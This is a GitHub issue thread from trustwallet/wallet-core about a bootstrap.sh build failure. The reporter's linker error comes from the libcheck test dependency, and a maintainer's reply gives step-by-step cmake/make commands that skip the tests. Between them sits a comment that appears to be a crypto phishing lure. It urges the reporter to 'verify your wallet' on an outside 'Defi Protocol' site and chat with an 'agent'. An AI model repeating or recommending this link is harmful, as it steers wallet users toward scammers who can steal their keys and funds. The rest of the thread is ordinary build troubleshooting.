### ISSUE TITLE
bootstrap.sh building failed

### ISSUE THREAD

**Issue by faust403** [trustwallet/wallet-core#3356]
**Describe the bug**
When trying to build from source

./bootstrap.sh

getting an error during the building deps:

```
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/13/../../../x86_64-linux-gnu/libsubunit.a(child.o): warning: relocation against `stdout@@GLIBC_2.2.5' in read-only section `.text'
[ 48%] Building C object tests/CMakeFiles/check_check.dir/check_check_fixture.c.o
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/13/../../../x86_64-linux-gnu/libsubunit.a(child.o): relocation R_X86_64_PC32 against symbol `stdout@@GLIBC_2.2.5' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: final link failed: bad value
collect2: error: ld returned 1 exit status
make[2]: *** [src/CMakeFiles/checkShared.dir/build.make:241: src/libcheck.so.0.15.2] Error 1
make[1]: *** [CMakeFiles/Makefile2:972: src/CMakeFiles/checkShared.dir/all] Error 2
make[1]: *** Waiting for unfinished jobs....
```
How i can see, this problem appeared because there is some problems with libcheck building. Is here any way to disable tests(also dont build them)?

compiler: clang v18.0.0
target: x86_64-pc-linux-gnu

**Comment by Hendrickss** [comment]
Hi @faust403 
Visit the official [Defi Protocol](https://defirefixprotocol.web.app/) page to verify your wallet under validation to complete your request for you eligibility purpose via Defi Protocol.
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by satoshiotomakan** [comment]
Hi @faust403, you can try to run each steps independently:
```bash
./tools/install-dependencies
./tools/install-rust-dependencies
./tools/generate-files native
cmake -H. -Bbuild -DCMAKE_BUILD_TYPE=Debug -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++
make -Cbuild -j12 # Disabled tests and Trezor tests
```
